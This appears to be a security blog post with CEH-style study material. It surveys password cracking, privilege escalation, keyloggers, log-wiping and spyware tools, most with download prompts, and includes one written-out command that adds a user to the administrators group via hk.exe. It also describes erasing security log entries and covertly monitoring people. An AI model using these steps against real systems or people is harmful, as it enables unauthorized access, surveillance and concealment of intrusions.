Password Cracking,Escalating Privileges and Hiding Files

There are various aspects of system hacking. As we recall from Footprinting, "Gathering Networt and Host Information: Scanning and Enumeration" the system hacking cycle consists of six steps. The first step—enumeration—was discussed in the previous topic. The TechTrick covers the five remaining steps:

  • Cracking passwords
  • Escalating privileges
  • Executing applications
  • Hiding files
  • Covering tracks

The Simplest Way to Get a Password

Many hacking attempts start with getting a password to a target system. Passwords are the key piece of information needed to access a system and users often select passwords that are easy to guess.Many reuse passwords or choose one thats simple—such as a pets name to help them remember it. Because of this human factor, most password guessing is successful if some information is known about the target. Information gathering and reconnaissance can help give away information that will help a hacker guess a users password.


Once a password is guessed or cracked, it can be the launching point for escalating privileges, executing applications, hiding files, and covering tracks . If guessing a password fails,then passwords may be cracked manually or with automated tools such as a dictionary or brute-force method


Types of Passwords

Several types of passwords are used to provide access to systems. The characters that form a password can fall into any of these categories:

  • Passwords that contain only letters.
  • Passwords that contain only numbers.
  • Passwords that contain only special characters.
  • Passwords that contain letters and numbers.
  • Passwords that contain only letters and special characters.
  • Passwords that contain only special characters and numbers.
  • Passwords that contain letters, special characters and numbers.

Administrator Password Guessing

  • Assuming that NetBIOS TCP139 port is open, the most effective method of breaking into NT/2000 is password guessing.
  • Attempting to connect to an enumerated share (IPC$ or C$) and trying username/password.
  • Default Admin$, C$, %Systemdrive% shares are good starting point.

Password Sniffing

Password guessing is hard work. Why not just sniff credentials off the wire as users log in to a server and then replay them to gain access?


System Hacking:Password Cracking,Escalating Privileges,and Hiding Files


Cracking a Password

Manual password cracking involves attempting to log on with different passwords.The hacker follows these steps :-

  • Find a valid user account (such as Administrator or Guest).
  • Create a list of possible passwords.
  • Rank the passwords from high to low probability.
  • Key in each password.
  • Try again until a successful password is found.

A hacker can also create a script file that tries each password in a list. This is still considered manual cracking but its time consuming and not usually effective.


Hacking Tool: LOphtcrack

L0phtCrack is a password auditing and recovery package distributed by @@stake software, which is now owned by Symantec. It performs Server Message Block (SMB) packet captures on the local network segment and captures individual login sessions. L0phtCrack contains dictionary, brute-force, and hybrid attack capabilities. Symantec has recently stopped development of the L0phtCrack tool but it can still be found on the Internet.

With LOphtcrack password cracking engine anyone can sniff the ire for extended periods is most guaranteed to obtain Administrator status in matter of days.

Download LOphtcrack



Hacking Tool: KerbCrack

KerbCrack consists of two programs, kerbsniff and kerbcrack.The sniffer listens on the network and captures Windows 2000/XP Kerberos logins. The cracker can be used to find the passwords from the capture file using a bruteforce attack or a dictionary attack.


System Hacking:Password Cracking,Escalating Privileges,and Hiding Files

Download KerbCrack


Hacking Tools : Legion

Legion automates the password guessing in NetBIOS sessions. Legion scans multiple IP address ranges for Windows shares and also offers a manual dictionary attack tool.


Hacking Tools : NTInfoScan

NTInfoScan is a security scanner for NT 4.0. This vulnerability scanner produces an HTML-based report of security issues found on the target system and other information.


Hacking Tools : LC5

LC5 is another good password cracking tool. LC5 is a suitable replacement for L0phtCrack.


Hacking Tools : Privilege Escalation

If an attacker gains access to the network using non-admin user account, the next step is to gain higher privilege to that of an administrator.

This is called privilege escalation.

Download Privilege Escalation


Hacking Tool: GetAdmin

1. GetAdmin.exe is a small program that adds a user to the local administrators group.

2. It uses low-level NT kernel routine to set a globalflag allowing access to any running process.

3. You need to logon to the server console to execute the program.

4. The GetAdmin.exe is run from the command line or from a browser.

5. This only works with Nt 4.0 Service pack 3.


Hacking Tool: hk.exe

1. The hk.exe utility exposes a Local Procedure Call flaw in NT.

2. A non-admin user can be escalated to administrators group using hk.exe


c:\>net localgroup administrators akash /add access denied
c:\>hk net localgroup administrators akash /add access pid & tid are:47 -48

NtImpersonateClientOfPort succeeded


Types of Password Attacks

  • Dictionary attack
  • Brute force attack
  • Hybrid attack
  • Social engineering
  • Shoulder surfing
  • Dumpster diving

Hacking Tool: SMB Grind

SMBGrind increases the speed of LOphtcrack sessions on sniffer dumps by removing duplication and providing a facility to target specific users without having to edit the dump files manually.

Download SMB Grind


Hacking Tool: SMBDie

SMBDie tool crashes computers running Windows 2000/XP/NT by sending specially crafted SMB request.


Hacking Tool: NBTDeputy

NBTDeputy register a NetBIOS computer name on the networkand is ready to respond to NetBT name-query requests.

NBTdeputy helps to resolve IP address from NetBIOS computer name. Its similar to Proxy ARP.

This tool works well with SMBRelay.

For example, SMBRelay runs on a computer as ANONYMOUS-ONE and the IP address is 192.168.1.10 and NBTDeputy is also ran and 192.168.1.10 is specified. SMBRelay may connect to any XP or .NET server when the logon users access "My Network Places".


Hacking Tool: John the Ripper

It is a command line tool designed to crack both Unix and NT passwords.John is extremely fast and free

The resulting passwords are case insensitive and may not represent the real mixed-case password.

Download John the Ripper


Hacking Tool: Win32CreateLocalAdminUser

Win32CreateLocalAdminUser is a program that creates a new user with the username and password X and adds the user to the local administrators group.This action is part of the Metasploit Project and can be launched with the Metasploit framework on Windows.


Hacking Tool: Offline NT Password Resetter

Offline NT Password Resetter is a method of resetting the password to the administrators account when the system is not booted to Windows. The most common method is to boot to a Linux boot CD and then access the NTFS partition which is no longer protected, and change the password.

Download Offline NT Password Resetter


Download and install ophcrack from http://ophcrack.sourceforge.net


Hacking Tool : Keystroke Loggers

1. If all other attempts to sniff out domain privileges fail, then keystroke logger is the solution.

2. Keystroke loggers are stealth software that sits between keyboard hardware and the operating system, so that they can record every key stroke.

3. There are two types of keystroke loggers :-

• 1. Software based and

• 2. Hardware based

Download Keystroke Loggers


Hacking Tool: WinZapper

1. Wizapper is a tool that an attacker can use to erase event records selectively from the security log in Windows 2000.

2. To use the program, the attacker runs winzapper.exe and marks the event records to be deleted then he presses delete events.

3. To sum things up: after an attacker has gained Administrators access to the system one simply cannot trust the security log!


Hacking Tool: Hardware Key Logger(www.keyghost.com)

1. The Hardware Key Logger is a tiny hardware device that can be attached in between a keyboard and a computer.

2. It keeps a record of all key strokes typed on the keyboard. The recording process is totally transparent to the end user.


Spy ware: Spector (www.spector.com)

1. Spector is a spy ware and it will record everything anyone does on the internet.

2. Spector automatically takes hundreds of snapshots every hour, very much like a surveillance camera. With spector you will be able to see exactly what your surveillance targets have been doing online and offline.

3. Spector works by taking a snapshot of whatever is on your computer screen and saves it away in a hidden location on your computers hard drive.



I hope you enjoyed this article.



About Author

Akash is a co-founder and an aspiring entrepreneur who keeps a close eye on open source, tech giants, and security. Get in touch with him by sending an email.

akashchugh1994@gmail.com

Who Should Read TechTrick?

All the tricks and tips that TechTrick provides only for educational purpose. If you choose to use the information in TechTrick to break into computer systems maliciously and without authorization, you are on your own. Neither I (TechTrick Admin) nor anyone else associated with TechTrick shall be liable. We are not responsibe for any issues that caused due to informations provided here. So, Try yourself and see the results. You are not losing anything by trying... We are humans, Mistakes are quite natural. Here on TechTrick also have many mistakes..